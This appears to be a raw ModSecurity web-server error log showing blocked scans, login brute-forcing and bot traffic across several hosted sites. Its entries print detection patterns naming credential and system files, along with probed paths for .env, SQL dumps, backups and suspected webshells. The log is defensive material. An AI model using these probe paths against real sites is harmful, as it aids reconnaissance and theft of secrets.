[Tue May 26 19:49:53.875361 2026] [security2:error] [pid 86490:tid 86678] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWsCVZMwN0DpLVWo6KILwAAAL8"]
[Tue May 26 19:49:54.100973 2026] [security2:error] [pid 86490:tid 86730] [client 45.154.98.198:62692] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/plugins/content/apismtp/apismtp.php"] [unique_id "ahWsClZMwN0DpLVWo6KITwAAAPM"]
[Tue May 26 19:49:54.316775 2026] [security2:error] [pid 86490:tid 86702] [client 185.177.72.53:6956] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/api/keys/database.sql"] [unique_id "ahWsClZMwN0DpLVWo6KIUgAAANc"]
[Tue May 26 19:49:54.558803 2026] [security2:error] [pid 86490:tid 86680] [client 45.154.98.198:50552] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/wp-content/plugins/apikey/apikey.php.suspected"] [unique_id "ahWsClZMwN0DpLVWo6KIYQAAAME"]
[Tue May 26 19:49:55.080823 2026] [security2:error] [pid 86490:tid 86685] [client 45.131.193.17:20447] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.193.131.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "karuppuswamykovil.in"] [uri "/wp-login.php"] [unique_id "ahWsClZMwN0DpLVWo6KIaAAAAMY"]
[Tue May 26 19:49:55.118137 2026] [security2:error] [pid 86490:tid 86673] [client 4.197.75.18:3278] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 18.75.197.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcemachinelearning.co.in.md-74.webhostbox.net"] [uri "/edit.php"] [unique_id "ahWsC1ZMwN0DpLVWo6KIcAAAALo"]
[Tue May 26 19:49:55.118266 2026] [security2:error] [pid 86490:tid 86673] [client 4.197.75.18:3278] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "gcemachinelearning.co.in.md-74.webhostbox.net"] [uri "/edit.php"] [unique_id "ahWsC1ZMwN0DpLVWo6KIcAAAALo"]
[Tue May 26 19:49:55.254683 2026] [security2:error] [pid 86490:tid 86652] [client 45.154.98.198:56999] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/plugins/content/apismtp/apismtp.php.suspected"] [unique_id "ahWsC1ZMwN0DpLVWo6KIeAAAAKU"]
[Tue May 26 19:49:56.149979 2026] [security2:error] [pid 86490:tid 86645] [client 185.191.171.12:54098] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "cargo-pulse.info"] [uri "/robots.txt"] [unique_id "ahWsDFZMwN0DpLVWo6KInAAAAJ4"]
[Tue May 26 19:49:56.150117 2026] [security2:error] [pid 86490:tid 86645] [client 185.191.171.12:54098] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "cargo-pulse.info"] [uri "/robots.txt"] [unique_id "ahWsDFZMwN0DpLVWo6KInAAAAJ4"]
[Tue May 26 19:49:56.471758 2026] [security2:error] [pid 86490:tid 86714] [client 185.191.171.6:43482] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "cargo-pulse.info"] [uri "/"] [unique_id "ahWsDFZMwN0DpLVWo6KIogAAAOM"]
[Tue May 26 19:49:56.471887 2026] [security2:error] [pid 86490:tid 86714] [client 185.191.171.6:43482] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "cargo-pulse.info"] [uri "/"] [unique_id "ahWsDFZMwN0DpLVWo6KIogAAAOM"]
[Tue May 26 19:49:56.551283 2026] [security2:error] [pid 86490:tid 86709] [client 4.197.75.18:3326] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 18.75.197.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcemachinelearning.co.in.md-74.webhostbox.net"] [uri "/sid3.php"] [unique_id "ahWsDFZMwN0DpLVWo6KIpgAAAN4"]
[Tue May 26 19:49:56.551391 2026] [security2:error] [pid 86490:tid 86709] [client 4.197.75.18:3326] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "gcemachinelearning.co.in.md-74.webhostbox.net"] [uri "/sid3.php"] [unique_id "ahWsDFZMwN0DpLVWo6KIpgAAAN4"]
[Tue May 26 19:49:57.064840 2026] [security2:error] [pid 86490:tid 86669] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWsDFZMwN0DpLVWo6KIrQAAALY"]
[Tue May 26 19:49:57.453332 2026] [security2:error] [pid 86490:tid 86736] [client 185.177.72.53:6956] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/fitness-app/client/.env"] [unique_id "ahWsDVZMwN0DpLVWo6KIwQAAAPk"]
[Tue May 26 19:49:57.623745 2026] [security2:error] [pid 86490:tid 86743] [client 185.177.72.53:6956] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/config/static/readme.bak"] [unique_id "ahWsDVZMwN0DpLVWo6KIxQAAAQA"]
[Tue May 26 19:49:57.909023 2026] [security2:error] [pid 86490:tid 86566] [remote 161.97.109.81:49164] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 81.109.97.161.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWsDVZMwN0DpLVWo6KI1QAAw0s"]
[Tue May 26 19:49:58.152203 2026] [security2:error] [pid 86490:tid 86692] [client 4.197.75.18:3335] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 18.75.197.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcemachinelearning.co.in.md-74.webhostbox.net"] [uri "/load.php"] [unique_id "ahWsDlZMwN0DpLVWo6KI3wAAAM0"]
[Tue May 26 19:49:58.152311 2026] [security2:error] [pid 86490:tid 86692] [client 4.197.75.18:3335] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "gcemachinelearning.co.in.md-74.webhostbox.net"] [uri "/load.php"] [unique_id "ahWsDlZMwN0DpLVWo6KI3wAAAM0"]
[Tue May 26 19:49:58.310813 2026] [security2:error] [pid 86490:tid 86630] [client 185.177.72.53:6956] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/reset/.env"] [unique_id "ahWsDlZMwN0DpLVWo6KI5gAAAI8"]
[Tue May 26 19:49:58.899350 2026] [security2:error] [pid 86490:tid 86571] [remote 161.97.109.81:49164] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 81.109.97.161.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWsDlZMwN0DpLVWo6KI_wAAiVA"], referer: https://moes-art.com/wp-login.php
[Tue May 26 19:49:58.999806 2026] [security2:error] [pid 86490:tid 86689] [client 185.177.72.53:6956] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/sql/full.sql"] [unique_id "ahWsDlZMwN0DpLVWo6KJBAAAAMo"]
[Tue May 26 19:49:59.136815 2026] [security2:error] [pid 86490:tid 86698] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWsDlZMwN0DpLVWo6KI9gAAANM"]
[Tue May 26 19:50:00.006429 2026] [security2:error] [pid 86490:tid 86655] [client 185.177.72.53:6956] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/blog-app/client/.env"] [unique_id "ahWsEFZMwN0DpLVWo6KJKQAAAKg"]
[Tue May 26 19:50:00.520281 2026] [security2:error] [pid 86490:tid 86740] [client 185.177.72.53:6956] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/web/dump.sql"] [unique_id "ahWsEFZMwN0DpLVWo6KJMgAAAP0"]
[Tue May 26 19:50:00.526987 2026] [security2:error] [pid 86490:tid 86703] [client 4.197.75.18:3296] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 18.75.197.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcemachinelearning.co.in.md-74.webhostbox.net"] [uri "/166.php"] [unique_id "ahWsEFZMwN0DpLVWo6KJMwAAANg"]
[Tue May 26 19:50:00.527104 2026] [security2:error] [pid 86490:tid 86703] [client 4.197.75.18:3296] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "gcemachinelearning.co.in.md-74.webhostbox.net"] [uri "/166.php"] [unique_id "ahWsEFZMwN0DpLVWo6KJMwAAANg"]
[Tue May 26 19:50:00.609616 2026] [security2:error] [pid 86490:tid 86710] [client 77.75.79.72:8245] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "jetstarprojects.com"] [uri "/robots.txt"] [unique_id "ahWsEFZMwN0DpLVWo6KJNAAAAN8"]
[Tue May 26 19:50:00.609778 2026] [security2:error] [pid 86490:tid 86710] [client 77.75.79.72:8245] ModSecurity: Warning. Matched phrase "Seznam" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "jetstarprojects.com"] [uri "/robots.txt"] [unique_id "ahWsEFZMwN0DpLVWo6KJNAAAAN8"]
[Tue May 26 19:50:00.684734 2026] [security2:error] [pid 86490:tid 86640] [client 77.75.79.72:31768] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "jetstarprojects.com"] [uri "/"] [unique_id "ahWsEFZMwN0DpLVWo6KJNQAAAJk"]
[Tue May 26 19:50:00.684841 2026] [security2:error] [pid 86490:tid 86640] [client 77.75.79.72:31768] ModSecurity: Warning. Matched phrase "Seznam" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "jetstarprojects.com"] [uri "/"] [unique_id "ahWsEFZMwN0DpLVWo6KJNQAAAJk"]
[Tue May 26 19:50:00.690429 2026] [security2:error] [pid 86490:tid 86657] [client 185.177.72.53:6956] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/weather-app/.env"] [unique_id "ahWsEFZMwN0DpLVWo6KJNgAAAKo"]
[Tue May 26 19:50:00.889166 2026] [security2:error] [pid 86490:tid 86576] [remote 162.214.121.181:58494] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 181.121.214.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWsEFZMwN0DpLVWo6KJNwAAo1U"]
[Tue May 26 19:50:01.377809 2026] [security2:error] [pid 86490:tid 86690] [client 85.208.96.200:60138] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/july-8-12/list/"] [unique_id "ahWsEVZMwN0DpLVWo6KJVwAAAMs"]
[Tue May 26 19:50:01.377917 2026] [security2:error] [pid 86490:tid 86690] [client 85.208.96.200:60138] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/july-8-12/list/"] [unique_id "ahWsEVZMwN0DpLVWo6KJVwAAAMs"]
[Tue May 26 19:50:02.268060 2026] [security2:error] [pid 86490:tid 86645] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWsEVZMwN0DpLVWo6KJbgAAAJ4"]
[Tue May 26 19:50:02.591396 2026] [security2:error] [pid 86490:tid 86583] [remote 162.214.121.181:58494] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 181.121.214.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWsElZMwN0DpLVWo6KJiQAArFw"], referer: https://yourstorybag.com/wp-login.php
[Tue May 26 19:50:02.665560 2026] [security2:error] [pid 86490:tid 86739] [client 4.197.75.18:3349] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 18.75.197.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcemachinelearning.co.in.md-74.webhostbox.net"] [uri "/load.php"] [unique_id "ahWsElZMwN0DpLVWo6KJjwAAAPw"]
[Tue May 26 19:50:02.665721 2026] [security2:error] [pid 86490:tid 86739] [client 4.197.75.18:3349] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "gcemachinelearning.co.in.md-74.webhostbox.net"] [uri "/load.php"] [unique_id "ahWsElZMwN0DpLVWo6KJjwAAAPw"]
[Tue May 26 19:50:02.709050 2026] [security2:error] [pid 86490:tid 86735] [client 185.177.72.53:61844] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/smtp.yaml.bak"] [unique_id "ahWsElZMwN0DpLVWo6KJkQAAAPg"]
[Tue May 26 19:50:03.027848 2026] [security2:error] [pid 86490:tid 86731] [client 100.18.4.235:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWsElZMwN0DpLVWo6KJiAAAAPQ"]
[Tue May 26 19:50:03.199365 2026] [security2:error] [pid 86490:tid 86667] [client 185.177.72.53:61844] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/resources/docker/.env"] [unique_id "ahWsE1ZMwN0DpLVWo6KJoAAAALQ"]
[Tue May 26 19:50:03.612604 2026] [security2:error] [pid 86490:tid 86585] [remote 74.207.252.187:55484] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 187.252.207.74.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWsE1ZMwN0DpLVWo6KJrQAA8F4"]
[Tue May 26 19:50:03.969194 2026] [security2:error] [pid 86490:tid 86689] [client 4.197.75.18:3286] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 18.75.197.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcemachinelearning.co.in.md-74.webhostbox.net"] [uri "/166.php"] [unique_id "ahWsE1ZMwN0DpLVWo6KJwQAAAMo"]
[Tue May 26 19:50:03.969312 2026] [security2:error] [pid 86490:tid 86689] [client 4.197.75.18:3286] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "gcemachinelearning.co.in.md-74.webhostbox.net"] [uri "/166.php"] [unique_id "ahWsE1ZMwN0DpLVWo6KJwQAAAMo"]
[Tue May 26 19:50:04.183019 2026] [security2:error] [pid 86490:tid 86657] [client 185.177.72.53:61844] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/var/www/html/render/.env"] [unique_id "ahWsFFZMwN0DpLVWo6KJzAAAAKo"]
[Tue May 26 19:50:04.276455 2026] [fcgid:warn] [pid 86490:tid 86677] (70014)End of file found: [client 199.45.154.159:34188] mod_fcgid: can't get data from http client
[Tue May 26 19:50:04.345723 2026] [security2:error] [pid 86490:tid 86686] [client 185.177.72.53:61844] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/api/config/default.bak"] [unique_id "ahWsFFZMwN0DpLVWo6KJ1wAAAMc"]
[Tue May 26 19:50:04.357578 2026] [security2:error] [pid 86490:tid 86652] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWsE1ZMwN0DpLVWo6KJwAAAAKU"]
[Tue May 26 19:50:04.848851 2026] [security2:error] [pid 86490:tid 86658] [client 85.208.96.209:63120] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "cargo-pulse.info"] [uri "/sitemap.xml"] [unique_id "ahWsFFZMwN0DpLVWo6KJ5gAAAKs"]
[Tue May 26 19:50:04.849018 2026] [security2:error] [pid 86490:tid 86658] [client 85.208.96.209:63120] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "cargo-pulse.info"] [uri "/sitemap.xml"] [unique_id "ahWsFFZMwN0DpLVWo6KJ5gAAAKs"]
[Tue May 26 19:50:04.993782 2026] [security2:error] [pid 86490:tid 86590] [remote 5.78.119.122:60450] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 122.119.78.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWsFFZMwN0DpLVWo6KJ4AAA-WM"]
